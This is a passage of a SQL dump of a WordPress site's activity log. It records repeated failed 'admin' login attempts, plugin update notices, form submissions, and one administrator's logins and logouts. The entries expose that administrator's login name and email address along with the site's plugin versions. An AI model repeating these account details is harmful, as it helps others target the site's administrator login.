Firefox/31.0'),(239455,40728,'_message_key','user_unknown_login_failed'),(239456,40728,'_server_remote_addr','205.185.122.x'),(239457,40729,'failed_username','admin'),(239458,40729,'server_http_user_agent','Mozilla/5.0'),(239459,40729,'_message_key','user_unknown_login_failed'),(239460,40729,'_server_remote_addr','104.225.143.x'),(239461,40730,'failed_username','admin'),(239462,40730,'server_http_user_agent','Mozilla/5.0'),(239463,40730,'_message_key','user_unknown_login_failed'),(239464,40730,'_server_remote_addr','104.225.143.x'),(239465,40731,'post_id','269320'),(239466,40731,'post_type','nf_sub'),(239467,40731,'post_title',''),(239468,40731,'_message_key','post_updated'),(239469,40731,'_server_remote_addr','38.104.33.x'),(239470,40731,'_server_http_referer','https://eckankar-colorado.org/resa-faq/satsang-class-registrations-2023-2024/?utm_source=BenchmarkEmail&utm_campaign=ETC_November_2023_News&utm_medium=email'),(239471,40732,'failed_username','admin'),(239472,40732,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36'),(239473,40732,'_message_key','user_unknown_login_failed'),(239474,40732,'_xmlrpc_request','true'),(239475,40732,'_server_remote_addr','20.38.46.x'),(239476,40733,'plugin_name','Wordfence Security'),(239477,40733,'plugin_current_version','7.10.5'),(239478,40733,'plugin_new_version','7.10.6'),(239479,40733,'_message_key','plugin_update_available'),(239480,40733,'_server_remote_addr','173.231.231.x'),(239481,40734,'plugin_slug','wordfence'),(239482,40734,'request','{\n    \"doing_wp_cron\": \"1698768867.6180069446563720703125\"\n}'),(239483,40734,'plugin_name','Wordfence Security'),(239484,40734,'plugin_title','<a href=\"http://www.wordfence.com/\">Wordfence Security</a>'),(239485,40734,'plugin_description','Wordfence Security &#8211; Anti-virus, Firewall and Malware Scan <cite>By <a href=\"http://www.wordfence.com/\">Wordfence</a>.</cite>'),(239486,40734,'plugin_author','<a href=\"http://www.wordfence.com/\">Wordfence</a>'),(239487,40734,'plugin_version','7.10.6'),(239488,40734,'plugin_url','http://www.wordfence.com/'),(239489,40734,'plugin_prev_version','7.10.5'),(239490,40734,'_message_key','plugin_updated'),(239491,40734,'_wp_cron_running','true'),(239492,40734,'_server_remote_addr','173.231.231.x'),(239493,40735,'failed_username','admin'),(239494,40735,'server_http_user_agent','Mozilla/5.0'),(239495,40735,'_message_key','user_unknown_login_failed'),(239496,40735,'_server_remote_addr','52.232.6.x'),(239497,40736,'failed_username','admin'),(239498,40736,'server_http_user_agent','Mozilla/5.0'),(239499,40736,'_message_key','user_unknown_login_failed'),(239500,40736,'_server_remote_addr','52.232.6.x'),(239501,40737,'failed_username','admin'),(239502,40737,'server_http_user_agent','Mozilla/5.0'),(239503,40737,'_message_key','user_unknown_login_failed'),(239504,40737,'_server_remote_addr','52.232.6.x'),(239505,40738,'failed_username','admin'),(239506,40738,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36'),(239507,40738,'_message_key','user_unknown_login_failed'),(239508,40738,'_xmlrpc_request','true'),(239509,40738,'_server_remote_addr','20.244.36.x'),(239510,40739,'failed_username','admin'),(239511,40739,'server_http_user_agent','Mozilla/5.0'),(239512,40739,'_message_key','user_unknown_login_failed'),(239513,40739,'_server_remote_addr','52.232.6.x'),(239514,40740,'failed_username','admin'),(239515,40740,'server_http_user_agent','Mozilla/5.0'),(239516,40740,'_message_key','user_unknown_login_failed'),(239517,40740,'_server_remote_addr','52.232.6.x'),(239518,40741,'failed_username','admin'),(239519,40741,'server_http_user_agent','Mozilla/5.0'),(239520,40741,'_message_key','user_unknown_login_failed'),(239521,40741,'_server_remote_addr','52.232.6.x'),(239522,40742,'failed_username','admin'),(239523,40742,'server_http_user_agent','Mozilla/5.0'),(239524,40742,'_message_key','user_unknown_login_failed'),(239525,40742,'_server_remote_addr','52.232.6.x'),(239526,40743,'failed_username','admin'),(239527,40743,'server_http_user_agent','Mozilla/5.0'),(239528,40743,'_message_key','user_unknown_login_failed'),(239529,40743,'_server_remote_addr','52.232.6.x'),(239530,40744,'failed_username','admin'),(239531,40744,'server_http_user_agent','Mozilla/5.0'),(239532,40744,'_message_key','user_unknown_login_failed'),(239533,40744,'_server_remote_addr','52.232.6.x'),(239534,40745,'failed_username','admin'),(239535,40745,'server_http_user_agent','Mozilla/5.0'),(239536,40745,'_message_key','user_unknown_login_failed'),(239537,40745,'_server_remote_addr','52.232.6.x'),(239538,40746,'failed_username','admin'),(239539,40746,'server_http_user_agent','Mozilla/5.0'),(239540,40746,'_message_key','user_unknown_login_failed'),(239541,40746,'_server_remote_addr','52.232.6.x'),(239542,40747,'failed_username','admin'),(239543,40747,'server_http_user_agent','Mozilla/5.0'),(239544,40747,'_message_key','user_unknown_login_failed'),(239545,40747,'_server_remote_addr','52.232.6.x'),(239546,40748,'failed_username','admin'),(239547,40748,'server_http_user_agent','Mozilla/5.0'),(239548,40748,'_message_key','user_unknown_login_failed'),(239549,40748,'_server_remote_addr','52.232.6.x'),(239550,40749,'failed_username','admin'),(239551,40749,'server_http_user_agent','Mozilla/5.0'),(239552,40749,'_message_key','user_unknown_login_failed'),(239553,40749,'_server_remote_addr','52.232.6.x'),(239554,40750,'failed_username','admin'),(239555,40750,'server_http_user_agent','Mozilla/5.0'),(239556,40750,'_message_key','user_unknown_login_failed'),(239557,40750,'_server_remote_addr','52.232.6.x'),(239558,40751,'failed_username','admin'),(239559,40751,'server_http_user_agent','Mozilla/5.0'),(239560,40751,'_message_key','user_unknown_login_failed'),(239561,40751,'_server_remote_addr','52.232.6.x'),(239562,40752,'failed_username','admin'),(239563,40752,'server_http_user_agent','Mozilla/5.0'),(239564,40752,'_message_key','user_unknown_login_failed'),(239565,40752,'_server_remote_addr','52.232.6.x'),(239566,40753,'failed_username','admin'),(239567,40753,'server_http_user_agent','Mozilla/5.0'),(239568,40753,'_message_key','user_unknown_login_failed'),(239569,40753,'_server_remote_addr','52.232.6.x'),(239570,40754,'failed_username','admin'),(239571,40754,'server_http_user_agent','Mozilla/5.0'),(239572,40754,'_message_key','user_unknown_login_failed'),(239573,40754,'_server_remote_addr','52.232.6.x'),(239574,40755,'failed_username','admin'),(239575,40755,'server_http_user_agent','Mozilla/5.0'),(239576,40755,'_message_key','user_unknown_login_failed'),(239577,40755,'_server_remote_addr','52.232.6.x'),(239578,40756,'failed_username','admin'),(239579,40756,'server_http_user_agent','Mozilla/5.0'),(239580,40756,'_message_key','user_unknown_login_failed'),(239581,40756,'_server_remote_addr','52.232.6.x'),(239582,40757,'failed_username','admin'),(239583,40757,'server_http_user_agent','Mozilla/5.0'),(239584,40757,'_message_key','user_unknown_login_failed'),(239585,40757,'_server_remote_addr','52.232.6.x'),(239586,40758,'failed_username','admin'),(239587,40758,'server_http_user_agent','Mozilla/5.0'),(239588,40758,'_message_key','user_unknown_login_failed'),(239589,40758,'_server_remote_addr','52.232.6.x'),(239590,40759,'failed_username','admin'),(239591,40759,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36'),(239592,40759,'_message_key','user_unknown_login_failed'),(239593,40759,'_xmlrpc_request','true'),(239594,40759,'_server_remote_addr','52.144.45.x'),(239595,40760,'failed_username','admin'),(239596,40760,'server_http_user_agent','Mozilla/5.0'),(239597,40760,'_message_key','user_unknown_login_failed'),(239598,40760,'_server_remote_addr','20.244.36.x'),(239599,40761,'failed_username','admin'),(239600,40761,'server_http_user_agent','Mozilla/5.0'),(239601,40761,'_message_key','user_unknown_login_failed'),(239602,40761,'_server_remote_addr','20.244.36.x'),(239603,40762,'failed_username','admin'),(239604,40762,'server_http_user_agent','Mozilla/5.0'),(239605,40762,'_message_key','user_unknown_login_failed'),(239606,40762,'_server_remote_addr','20.244.36.x'),(239607,40763,'failed_username','admin'),(239608,40763,'server_http_user_agent','Mozilla/5.0'),(239609,40763,'_message_key','user_unknown_login_failed'),(239610,40763,'_server_remote_addr','52.232.6.x'),(239611,40764,'failed_username','admin'),(239612,40764,'server_http_user_agent','Mozilla/5.0'),(239613,40764,'_message_key','user_unknown_login_failed'),(239614,40764,'_server_remote_addr','20.244.36.x'),(239615,40765,'failed_username','admin'),(239616,40765,'server_http_user_agent','Mozilla/5.0'),(239617,40765,'_message_key','user_unknown_login_failed'),(239618,40765,'_server_remote_addr','20.244.36.x'),(239619,40766,'failed_username','admin'),(239620,40766,'server_http_user_agent','Mozilla/5.0'),(239621,40766,'_message_key','user_unknown_login_failed'),(239622,40766,'_server_remote_addr','52.232.6.x'),(239623,40767,'failed_username','admin'),(239624,40767,'server_http_user_agent','Mozilla/5.0'),(239625,40767,'_message_key','user_unknown_login_failed'),(239626,40767,'_server_remote_addr','20.244.36.x'),(239627,40768,'failed_username','admin'),(239628,40768,'server_http_user_agent','Mozilla/5.0'),(239629,40768,'_message_key','user_unknown_login_failed'),(239630,40768,'_server_remote_addr','20.244.36.x'),(239631,40769,'failed_username','admin'),(239632,40769,'server_http_user_agent','Mozilla/5.0'),(239633,40769,'_message_key','user_unknown_login_failed'),(239634,40769,'_server_remote_addr','52.232.6.x'),(239635,40770,'failed_username','admin'),(239636,40770,'server_http_user_agent','Mozilla/5.0'),(239637,40770,'_message_key','user_unknown_login_failed'),(239638,40770,'_server_remote_addr','20.244.36.x'),(239639,40771,'failed_username','admin'),(239640,40771,'server_http_user_agent','Mozilla/5.0'),(239641,40771,'_message_key','user_unknown_login_failed'),(239642,40771,'_server_remote_addr','52.232.6.x'),(239643,40772,'failed_username','admin'),(239644,40772,'server_http_user_agent','Mozilla/5.0'),(239645,40772,'_message_key','user_unknown_login_failed'),(239646,40772,'_server_remote_addr','20.244.36.x'),(239647,40773,'failed_username','admin'),(239648,40773,'server_http_user_agent','Mozilla/5.0'),(239649,40773,'_message_key','user_unknown_login_failed'),(239650,40773,'_server_remote_addr','20.244.36.x'),(239651,40774,'failed_username','admin'),(239652,40774,'server_http_user_agent','Mozilla/5.0'),(239653,40774,'_message_key','user_unknown_login_failed'),(239654,40774,'_server_remote_addr','20.244.36.x'),(239655,40775,'failed_username','admin'),(239656,40775,'server_http_user_agent','Mozilla/5.0'),(239657,40775,'_message_key','user_unknown_login_failed'),(239658,40775,'_server_remote_addr','20.244.36.x'),(239659,40776,'failed_username','admin'),(239660,40776,'server_http_user_agent','Mozilla/5.0'),(239661,40776,'_message_key','user_unknown_login_failed'),(239662,40776,'_server_remote_addr','20.244.36.x'),(239663,40777,'failed_username','administrator'),(239664,40777,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.3; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0'),(239665,40777,'_message_key','user_unknown_login_failed'),(239666,40777,'_server_remote_addr','209.141.56.x'),(239667,40778,'failed_username','admin'),(239668,40778,'server_http_user_agent','Mozilla/5.0'),(239669,40778,'_message_key','user_unknown_login_failed'),(239670,40778,'_server_remote_addr','20.244.36.x'),(239671,40779,'failed_username','admin'),(239672,40779,'server_http_user_agent','Mozilla/5.0'),(239673,40779,'_message_key','user_unknown_login_failed'),(239674,40779,'_server_remote_addr','20.244.36.x'),(239675,40780,'failed_username','admin'),(239676,40780,'server_http_user_agent','Mozilla/5.0'),(239677,40780,'_message_key','user_unknown_login_failed'),(239678,40780,'_server_remote_addr','20.244.36.x'),(239679,40781,'failed_username','admin'),(239680,40781,'server_http_user_agent','Mozilla/5.0'),(239681,40781,'_message_key','user_unknown_login_failed'),(239682,40781,'_server_remote_addr','20.244.36.x'),(239683,40782,'failed_username','admin'),(239684,40782,'server_http_user_agent','Mozilla/5.0'),(239685,40782,'_message_key','user_unknown_login_failed'),(239686,40782,'_server_remote_addr','20.244.36.x'),(239687,40783,'failed_username','admin'),(239688,40783,'server_http_user_agent','Mozilla/5.0'),(239689,40783,'_message_key','user_unknown_login_failed'),(239690,40783,'_server_remote_addr','20.244.36.x'),(239691,40784,'failed_username','admin'),(239692,40784,'server_http_user_agent','Mozilla/5.0'),(239693,40784,'_message_key','user_unknown_login_failed'),(239694,40784,'_server_remote_addr','20.244.36.x'),(239695,40785,'failed_username','admin'),(239696,40785,'server_http_user_agent','Mozilla/5.0'),(239697,40785,'_message_key','user_unknown_login_failed'),(239698,40785,'_server_remote_addr','20.244.36.x'),(239699,40786,'failed_username','admin'),(239700,40786,'server_http_user_agent','Mozilla/5.0'),(239701,40786,'_message_key','user_unknown_login_failed'),(239702,40786,'_server_remote_addr','20.244.36.x'),(239703,40787,'failed_username','admin'),(239704,40787,'server_http_user_agent','Mozilla/5.0'),(239705,40787,'_message_key','user_unknown_login_failed'),(239706,40787,'_server_remote_addr','20.244.36.x'),(239707,40788,'failed_username','admin'),(239708,40788,'server_http_user_agent','Mozilla/5.0'),(239709,40788,'_message_key','user_unknown_login_failed'),(239710,40788,'_server_remote_addr','20.244.36.x'),(239711,40789,'failed_username','admin'),(239712,40789,'server_http_user_agent','Mozilla/5.0'),(239713,40789,'_message_key','user_unknown_login_failed'),(239714,40789,'_server_remote_addr','20.244.36.x'),(239715,40790,'failed_username','admin'),(239716,40790,'server_http_user_agent','Mozilla/5.0'),(239717,40790,'_message_key','user_unknown_login_failed'),(239718,40790,'_server_remote_addr','20.244.36.x'),(239719,40791,'failed_username','admin'),(239720,40791,'server_http_user_agent','Mozilla/5.0'),(239721,40791,'_message_key','user_unknown_login_failed'),(239722,40791,'_server_remote_addr','20.244.36.x'),(239723,40792,'failed_username','admin'),(239724,40792,'server_http_user_agent','Mozilla/5.0'),(239725,40792,'_message_key','user_unknown_login_failed'),(239726,40792,'_server_remote_addr','20.244.36.x'),(239727,40793,'failed_username','admin'),(239728,40793,'server_http_user_agent','Mozilla/5.0'),(239729,40793,'_message_key','user_unknown_login_failed'),(239730,40793,'_server_remote_addr','20.244.36.x'),(239731,40794,'failed_username','admin'),(239732,40794,'server_http_user_agent','Mozilla/5.0'),(239733,40794,'_message_key','user_unknown_login_failed'),(239734,40794,'_server_remote_addr','20.244.36.x'),(239735,40795,'failed_username','admin'),(239736,40795,'server_http_user_agent','Mozilla/5.0'),(239737,40795,'_message_key','user_unknown_login_failed'),(239738,40795,'_server_remote_addr','20.244.36.x'),(239739,40796,'failed_username','admin'),(239740,40796,'server_http_user_agent','Mozilla/5.0'),(239741,40796,'_message_key','user_unknown_login_failed'),(239742,40796,'_server_remote_addr','20.244.36.x'),(239743,40797,'plugin_name','Advanced Google reCAPTCHA'),(239744,40797,'plugin_current_version','1.0.15'),(239745,40797,'plugin_new_version','1.11'),(239746,40797,'_message_key','plugin_update_available'),(239747,40797,'_server_remote_addr','173.231.231.x'),(239748,40798,'failed_username','admin'),(239749,40798,'server_http_user_agent','Mozilla/5.0'),(239750,40798,'_message_key','user_unknown_login_failed'),(239751,40798,'_server_remote_addr','20.244.36.x'),(239752,40799,'failed_username','admin'),(239753,40799,'server_http_user_agent','Mozilla/5.0'),(239754,40799,'_message_key','user_unknown_login_failed'),(239755,40799,'_server_remote_addr','20.244.36.x'),(239756,40800,'failed_username','admin'),(239757,40800,'server_http_user_agent','Mozilla/5.0'),(239758,40800,'_message_key','user_unknown_login_failed'),(239759,40800,'_server_remote_addr','20.244.36.x'),(239760,40801,'failed_username','admin'),(239761,40801,'server_http_user_agent','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10'),(239762,40801,'_message_key','user_unknown_login_failed'),(239763,40801,'_server_remote_addr','45.61.188.x'),(239764,40802,'failed_username','admin'),(239765,40802,'server_http_user_agent','Mozilla/5.0'),(239766,40802,'_message_key','user_unknown_login_failed'),(239767,40802,'_server_remote_addr','20.244.36.x'),(239768,40803,'failed_username','admin'),(239769,40803,'server_http_user_agent','Mozilla/5.0'),(239770,40803,'_message_key','user_unknown_login_failed'),(239771,40803,'_server_remote_addr','20.244.36.x'),(239772,40804,'failed_username','admin'),(239773,40804,'server_http_user_agent','Mozilla/5.0'),(239774,40804,'_message_key','user_unknown_login_failed'),(239775,40804,'_server_remote_addr','20.244.36.x'),(239776,40805,'failed_username','admin'),(239777,40805,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0'),(239778,40805,'_message_key','user_unknown_login_failed'),(239779,40805,'_server_remote_addr','209.141.62.x'),(239780,40806,'failed_username','admin'),(239781,40806,'server_http_user_agent','Mozilla/5.0'),(239782,40806,'_message_key','user_unknown_login_failed'),(239783,40806,'_server_remote_addr','20.244.36.x'),(239784,40807,'failed_username','admin'),(239785,40807,'server_http_user_agent','python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.71.1.el7.x86_64'),(239786,40807,'_message_key','user_unknown_login_failed'),(239787,40807,'_xmlrpc_request','true'),(239788,40807,'_server_remote_addr','43.139.114.x'),(239789,40807,'_server_http_referer','https://eckankar-colorado.org/xmlrpc.php'),(239790,40808,'failed_username','admin'),(239791,40808,'server_http_user_agent','Mozilla/5.0'),(239792,40808,'_message_key','user_unknown_login_failed'),(239793,40808,'_server_remote_addr','20.244.36.x'),(239794,40809,'failed_username','admin'),(239795,40809,'server_http_user_agent','Mozilla/5.0'),(239796,40809,'_message_key','user_unknown_login_failed'),(239797,40809,'_server_remote_addr','20.244.36.x'),(239798,40810,'failed_username','admin'),(239799,40810,'server_http_user_agent','Mozilla/5.0'),(239800,40810,'_message_key','user_unknown_login_failed'),(239801,40810,'_server_remote_addr','20.244.36.x'),(239802,40811,'failed_username','admin'),(239803,40811,'server_http_user_agent','Mozilla/5.0'),(239804,40811,'_message_key','user_unknown_login_failed'),(239805,40811,'_server_remote_addr','20.244.36.x'),(239806,40812,'failed_username','admin'),(239807,40812,'server_http_user_agent','Mozilla/5.0'),(239808,40812,'_message_key','user_unknown_login_failed'),(239809,40812,'_server_remote_addr','20.244.36.x'),(239810,40813,'failed_username','admin'),(239811,40813,'server_http_user_agent','Mozilla/5.0'),(239812,40813,'_message_key','user_unknown_login_failed'),(239813,40813,'_server_remote_addr','20.244.36.x'),(239814,40814,'failed_username','admin'),(239815,40814,'server_http_user_agent','Mozilla/5.0'),(239816,40814,'_message_key','user_unknown_login_failed'),(239817,40814,'_server_remote_addr','20.244.36.x'),(239818,40815,'failed_username','admin'),(239819,40815,'server_http_user_agent','Mozilla/5.0'),(239820,40815,'_message_key','user_unknown_login_failed'),(239821,40815,'_server_remote_addr','20.244.36.x'),(239822,40816,'failed_username','admin'),(239823,40816,'server_http_user_agent','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/7.0.5 Safari/537.77.4'),(239824,40816,'_message_key','user_unknown_login_failed'),(239825,40816,'_server_remote_addr','198.98.49.x'),(239826,40817,'failed_username','admin'),(239827,40817,'server_http_user_agent','Mozilla/5.0'),(239828,40817,'_message_key','user_unknown_login_failed'),(239829,40817,'_server_remote_addr','20.244.36.x'),(239830,40818,'failed_username','admin'),(239831,40818,'server_http_user_agent','Mozilla/5.0'),(239832,40818,'_message_key','user_unknown_login_failed'),(239833,40818,'_server_remote_addr','20.244.36.x'),(239834,40819,'failed_username','admin'),(239835,40819,'server_http_user_agent','Mozilla/5.0'),(239836,40819,'_message_key','user_unknown_login_failed'),(239837,40819,'_server_remote_addr','20.244.36.x'),(239838,40820,'failed_username','admin'),(239839,40820,'server_http_user_agent','Mozilla/5.0'),(239840,40820,'_message_key','user_unknown_login_failed'),(239841,40820,'_server_remote_addr','20.244.36.x'),(239842,40821,'failed_username','admin'),(239843,40821,'server_http_user_agent','Mozilla/5.0'),(239844,40821,'_message_key','user_unknown_login_failed'),(239845,40821,'_server_remote_addr','20.244.36.x'),(239846,40822,'failed_username','admin'),(239847,40822,'server_http_user_agent','Mozilla/5.0'),(239848,40822,'_message_key','user_unknown_login_failed'),(239849,40822,'_server_remote_addr','20.244.36.x'),(239850,40823,'failed_username','admin'),(239851,40823,'server_http_user_agent','Mozilla/5.0'),(239852,40823,'_message_key','user_unknown_login_failed'),(239853,40823,'_server_remote_addr','20.244.36.x'),(239854,40824,'failed_username','admin'),(239855,40824,'server_http_user_agent','Mozilla/5.0'),(239856,40824,'_message_key','user_unknown_login_failed'),(239857,40824,'_server_remote_addr','20.244.36.x'),(239858,40825,'plugin_name','Fluent Forms'),(239859,40825,'plugin_current_version','5.0.12'),(239860,40825,'plugin_new_version','5.1.0'),(239861,40825,'_message_key','plugin_update_available'),(239862,40825,'_server_remote_addr','173.231.231.x'),(239863,40826,'failed_username','admin'),(239864,40826,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36'),(239865,40826,'_message_key','user_unknown_login_failed'),(239866,40826,'_xmlrpc_request','true'),(239867,40826,'_server_remote_addr','20.38.46.x'),(239868,40827,'user_id','2'),(239869,40827,'user_email','nada@zipnadanot.org'),(239870,40827,'user_login','S8zhaBda'),(239871,40827,'_user_id','2'),(239872,40827,'_user_login','S8zhaBda'),(239873,40827,'_user_email','nada@zipnadanot.org'),(239874,40827,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0'),(241420,41031,'post_title',''),(241419,41031,'post_type','nf_sub'),(241418,41031,'post_id','269366'),(241417,41030,'_server_remote_addr','173.231.231.x'),(241416,41030,'_wp_cron_running','true'),(241415,41030,'_message_key','purged_events'),(241414,41030,'num_rows','555'),(241413,41030,'days','60'),(241421,41031,'_message_key','post_updated'),(241422,41031,'_server_remote_addr','174.29.87.x'),(241423,41031,'_server_http_referer','https://eckankar-colorado.org/resa-faq/satsang-class-registrations-2023-2024/'),(241424,41032,'plugin_name','UpdraftPlus - Backup/Restore'),(241425,41032,'plugin_current_version','1.23.10'),(241426,41032,'plugin_new_version','1.23.11'),(241427,41032,'_message_key','plugin_update_available'),(241428,41032,'_server_remote_addr','173.231.231.x'),(241429,41033,'plugin_name','Code Snippets'),(241430,41033,'plugin_current_version','3.5.0'),(241431,41033,'plugin_new_version','3.6.0'),(241432,41033,'_message_key','plugin_update_available'),(241433,41033,'_server_remote_addr','173.231.231.x'),(241434,41034,'plugin_name','Code Snippets'),(241435,41034,'plugin_current_version','3.5.0'),(241436,41034,'plugin_new_version','3.6.1'),(241437,41034,'_message_key','plugin_update_available'),(241438,41034,'_server_remote_addr','173.231.231.x'),(241439,41035,'plugin_name','Wordfence Security'),(241440,41035,'plugin_current_version','7.10.6'),(241441,41035,'plugin_new_version','7.10.7'),(241442,41035,'_message_key','plugin_update_available'),(241443,41035,'_server_remote_addr','173.231.231.x'),(241444,41036,'post_id','269367'),(241445,41036,'post_type','nf_sub'),(241446,41036,'post_title',''),(241447,41036,'_message_key','post_updated'),(241448,41036,'_server_remote_addr','73.95.242.x'),(241449,41036,'_server_http_referer','https://eckankar-colorado.org/resa-faq/satsang-class-registrations-2023-2024/?utm_source=BenchmarkEmail&utm_campaign=ETC_November_2023_News&utm_medium=email'),(241450,41037,'user_id','2'),(241451,41037,'user_email','nada@zipnadanot.org'),(241452,41037,'user_login','S8zhaBda'),(241453,41037,'_user_id','2'),(241454,41037,'_user_login','S8zhaBda'),(241455,41037,'_user_email','nada@zipnadanot.org'),(241456,41037,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0'),(241457,41037,'_message_key','user_logged_in'),(241458,41037,'_server_remote_addr','76.130.120.x'),(241459,41037,'_server_http_referer','https://eckankar-colorado.org/wp-login.php?redirect_to=https%3A%2F%2Fwww.eckankar-colorado.org%2Fwp-admin%2F&reauth=1'),(241460,41038,'_user_id','2'),(241461,41038,'_user_login','S8zhaBda'),(241462,41038,'_user_email','nada@zipnadanot.org'),(241463,41038,'_message_key','user_logged_out'),(241464,41038,'_server_remote_addr','76.130.120.x'),(241465,41038,'_server_http_referer','https://eckankar-colorado.org/wp-admin/profile.php'),(241466,41039,'post_id','269368'),(241467,41039,'post_type','nf_sub'),(241468,41039,'post_title',''),(241469,41039,'_message_key','post_updated'),(241470,41039,'_server_remote_addr','69.146.84.x'),(241471,41039,'_server_http_referer','https://eckankar-colorado.org/resa-faq/satsang-class-registrations-2023-2024/'),(241472,41040,'plugin_name','Post and Page Builder Premium'),(241473,41040,'plugin_current_version','1.1.1'),(241474,41040,'plugin_new_version','1.1.2'),(241475,41040,'_message_key','plugin_update_available'),(241476,41040,'_server_remote_addr','173.231.231.x'),(241477,41041,'user_id','2'),(241478,41041,'user_email','nada@zipnadanot.org'),(241479,41041,'user_login','S8zhaBda'),(241480,41041,'_user_id','2'),(241481,41041,'_user_login','S8zhaBda'),(241482,41041,'_user_email','nada@zipnadanot.org'),(241483,41041,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0'),(241484,41041,'_message_key','user_logged_in'),(241485,41041,'_server_remote_addr','76.130.120.x'),(241486,41041,'_server_http_referer','https://eckankar-colorado.org/wp-login.php?redirect_to=https%3A%2F%2Fwww.eckankar-colorado.org%2Fwp-admin%2F&reauth=1'),(241487,41042,'plugin_name','WP STAGING - Backup Duplicator &amp; Migration'),(241488,41042,'plugin_current_version','3.1.0'),(241489,41042,'plugin_new_version','3.1.1'),(241490,41042,'_message_key','plugin_update_available'),(241491,41042,'_server_remote_addr','173.231.231.x'),(241492,41043,'user_id','2'),(241493,41043,'user_email','nada@zipnadanot.org'),(241494,41043,'user_login','S8zhaBda'),(241495,41043,'_user_id','2'),(241496,41043,'_user_login','S8zhaBda'),(241497,41043,'_user_email','nada@zipnadanot.org'),(241498,41043,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0'),(241499,41043,'_message_key','user_logged_in'),(241500,41043,'_server_remote_addr','76.130.120.x'),(241501,41043,'_server_http_referer','https://eckankar-colorado.org/wp-login.php?redirect_to=https%3A%2F%2Fwww.eckankar-colorado.org%2Fwp-admin%2F&reauth=1'),(241502,41044,'plugin_slug','wordfence'),(241503,41044,'request','{\n    \"doing_wp_cron\": \"1699373449.2971930503845214843750\"\n}'),(241504,41044,'plugin_name','Wordfence Security'),(241505,41044,'plugin_title','<a href=\"http://www.wordfence.com/\">Wordfence Security</a>'),(241506,41044,'plugin_description','Wordfence Security &#8211; Anti-virus, Firewall and Malware Scan <cite>By <a href=\"http://www.wordfence.com/\">Wordfence</a>.</cite>'),(241507,41044,'plugin_author','<a href=\"http://www.wordfence.com/\">Wordfence</a>'),(241508,41044,'plugin_version','7.10.7'),(241509,41044,'plugin_url','http://www.wordfence.com/'),(241510,41044,'plugin_prev_version','7.10.6'),(241511,41044,'_message_key','plugin_updated'),(241512,41044,'_wp_cron_running','true'),(241513,41044,'_server_remote_addr','173.231.231.x'),(241514,41045,'plugin','really-simple-ssl/rlrsssl-really-simple-ssl.php'),(241515,41045,'plugin_name','Really Simple SSL'),(241516,41045,'plugin_title','<a href=\"https://really-simple-ssl.com\">Really Simple SSL</a>'),(241517,41045,'plugin_description','Lightweight SSL &amp; Hardening Plugin <cite>By <a href=\"https://really-simple-plugins.com\">Really Simple Plugins</a>.</cite>'),(241518,41045,'plugin_author','<a href=\"https://really-simple-plugins.com\">Really Simple Plugins</a>'),(241519,41045,'plugin_version','7.1.3'),(241520,41045,'plugin_url','https://really-simple-ssl.com'),(241521,41045,'_message_key','plugin_deleted'),(241522,41045,'_user_id','2'),(241523,41045,'_user_login','S8zhaBda'),(241524,41045,'_user_email','nada@zipnadanot.org'),(241525,41045,'_server_remote_addr','76.130.120.x'),(241526,41045,'_server_http_referer','https://eckankar-colorado.org/wp-admin/plugins.php'),(241527,41046,'plugin_slug','post-and-page-builder-premium'),(241528,41046,'plugin_name','Post and Page Builder Premium'),(241529,41046,'plugin_title','<a href=\"https://www.boldgrid.com/wordpress-page-builder-by-boldgrid/\">Post and Page Builder Premium</a>'),(241530,41046,'plugin_description','Premium extension for the Post and Page Builder. <cite>By <a href=\"https://www.boldgrid.com/\">BoldGrid</a>.</cite>'),(241531,41046,'plugin_author','<a href=\"https://www.boldgrid.com/\">BoldGrid</a>'),(241532,41046,'plugin_version','1.1.2'),(241533,41046,'plugin_url','https://www.boldgrid.com/wordpress-page-builder-by-boldgrid/'),(241534,41046,'plugin_prev_version','1.1.1'),(241535,41046,'_message_key','plugin_bulk_updated'),(241536,41046,'_user_id','2'),(241537,41046,'_user_login','S8zhaBda'),(241538,41046,'_user_email','nada@zipnadanot.org'),(241539,41046,'_server_remote_addr','76.130.120.x'),(241540,41046,'_server_http_referer','https://eckankar-colorado.org/wp-admin/plugins.php'),(241541,41047,'plugin_slug','updraftplus'),(241542,41047,'plugin_name','UpdraftPlus - Backup/Restore'),(241543,41047,'plugin_title','<a href=\"https://updraftplus.com\">UpdraftPlus - Backup/Restore</a>'),(241544,41047,'plugin_description','Backup and restore: take backups locally, or backup to Amazon S3, Dropbox, Google Drive, Rackspace, (S)FTP, WebDAV &amp; email, on automatic schedules. <cite>By <a href=\"https://updraftplus.com\">UpdraftPlus.Com, DavidAnderson</a>.</cite>'),(241545,41047,'plugin_author','<a href=\"https://updraftplus.com\">UpdraftPlus.Com, 